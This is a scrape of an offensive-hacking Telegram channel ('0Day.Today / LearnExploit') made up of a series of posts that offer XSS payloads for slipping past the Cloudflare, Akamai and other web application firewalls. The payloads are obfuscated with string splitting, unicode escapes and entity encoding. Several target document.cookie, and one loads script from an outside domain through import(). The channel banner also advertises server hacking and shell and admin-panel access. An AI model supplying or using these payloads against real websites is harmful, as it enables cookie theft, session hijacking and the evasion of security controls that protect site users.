0Day.Today | Learn Exploit | Zero World | Dark web |
19K subscribers
1.23K photos
125 videos
489 files
1.27K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
XSS WAF Bypass using location concatenation

Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

#Xss #WAF #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍8
payloads to bypass CloudFlare WAF

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

"&gt;&lt;BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"&gt;

&lt;--&lt;img/src=%20onerror=confirm``&gt;%20--!&gt;

&lt;iframe src=java&amp;Tab;sc&amp;Tab;ript:al&amp;Tab;ert()&gt;&lt;/iframe&gt;

&lt;sVg/onLy=1 onLoaD=confirm(1)//


#waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
9👍1
An Akamai WAF bypass

kuromatae"><textarea/onbeforeinput=kuro=&#x27;//domain.tld&#x27;;import(kuro)%09autofocus%09x>

#‌Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
3👍1🔥1
A payload to bypass some WAF

<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>

#‌Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
4👍3🔥2
Xss Bypass Waf

&lt;details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//

#bypass #waf
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍10👎1
CloudFlare WAF bypass payload

<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;

#WAF #bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥72👍2
An Akamai WAF bypass payload

%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22

#Waf #bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍91
An Akamai WAF bypass payload

1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>


#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥3👍1
A payload to bypass WAF

<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//


#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥4
Cloudflare WAF Bypass ⚡️

<a"/onclick=(confirm)(origin)>Click Here!

#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
4
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
43🔥3👍1
Cloudflare WAF Bypass Leads to Reflected XSS ®️

Payload Used : "&gt;&lt;img src=x onerror=alert(1)&gt; [Blocked By Cloudflare]

Payload Used : "&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt; [XSS Popup]

#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥42👍1👎1
Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!


#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥4🔥3💯211
bypass XSS Cloudflare WAF

Encoded Payload:

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

Clean Payload:

"><track/onerror='confirm`1`'>

HTML entity & URL encoding:

" --> &#34;
> --> &gt;
< --> &lt;
' --> &#x27;
` --> \%60

#Bypass #XSS #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥8👍4
Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5
Xss Payload

<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>

#xss #Bypass #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥4👍1